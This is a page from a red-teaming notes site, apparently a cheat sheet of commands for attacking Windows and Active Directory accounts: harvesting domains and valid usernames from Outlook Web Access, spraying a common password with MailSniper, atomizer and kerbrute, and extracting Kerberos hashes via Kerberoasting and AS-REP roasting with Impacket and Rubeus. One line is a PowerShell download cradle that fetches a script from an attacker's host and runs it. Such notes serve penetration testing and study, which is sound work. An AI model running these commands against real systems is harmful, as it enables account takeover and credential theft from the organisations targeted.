Red Teaming And Windows Notes
  • Windows
    • Local Privilege Escalation
      • PRIVILEGES INFORMATION
      • Open Ports
      • Stored Creds
      • PowerShell/CMD History
      • Unquoted Service Paths
      • Evaluating Vulnerable Drivers
      • Printer
      • $PATH interception
    • Shell generators
    • Credentials Hunting.
      • Mimikatz
      • Secretsdump
      • Pypykatz
    • Active Directory
      • Quick Wins
      • Tools
      • Basic Recon
      • Laps Password Read
      • Weaponizing Windows
        • Weaponizing Windows Pt-1
      • Winrm Using Certificate[PFX]
      • WriteOwner
    • Powershell
    • Password Spray And Roasting
Powered by GitBook
On this page
  • Owa
  • MailSniper
  • SprayingToolkit
  • Kerbrute
  • Kerberoast
  • Impacket
  • ASREPRoast
  • Rubeus
  • ASREPRoast
  1. Windows

Password Spray And Roasting

PreviousPowershell

Last updated 2 years ago

Owa

ipmo C: \Tools\MailSniper\MailSniper.ps1

Invoke-DomainHarvestOWA -ExchHostname 10.10.10.10 # Get Domain

Invoke-UsernameHarvestOWA -ExchHostname 10.10.10.10 -Domain <DOMAIN> -UserList .\usernames.txt -OutFile valid.txt # Get Valid Username using Time Attack

Invoke-PasswordSprayOWA -ExchHostname 10.10.10.10 -UserList .\valid.txt -Password Summer2021 # Spray One Password `Summer2021`

Get-GlobalAddressList -ExchHostname 10.10.10.10 -UserName <Domain>\<Valid_User> -Password <Valid_Password> -OutFile gal.txt # Dump All Username using Valid Creds.

atomizer.py owa owa.domain.local <password to spray> -emails.txt

kerbrute passwordspray -d <DOMAIN> --dc <IP Of DC> valid_users.txt <password to spray>

Kerberoast

Note: Sync Timezone and time with the target network. Windows => `tzdate /g` and Linux => rdate -n <targetip>

GetUserSPNs.py <domain>/<username>:<password> -outputfile <outfile>
powershell.exe -Command 'IEX (New-Object Net.Webclient).DownloadString("http://<ip>:<port>/Invoke-ASREP.ps1");Invoke-ASREPRoast -Domain <DOMAIN Name> -Server <DOMAIN IP> | select -expand hash
Rubeus.exe kerberoast

ASREPRoast

GetNPUsers.py <domain>/ -usersfile users.txt -outputfile <outfile> -dc-ip <DC IP> # Without credentials, using a valid users list
GetNPUsers.py <domain>/<username>:<password> -request -outputfile <outfile> # Using Valid credentials 

MailSniper
SprayingToolkit
Kerbrute
Impacket
ASREPRoast
Rubeus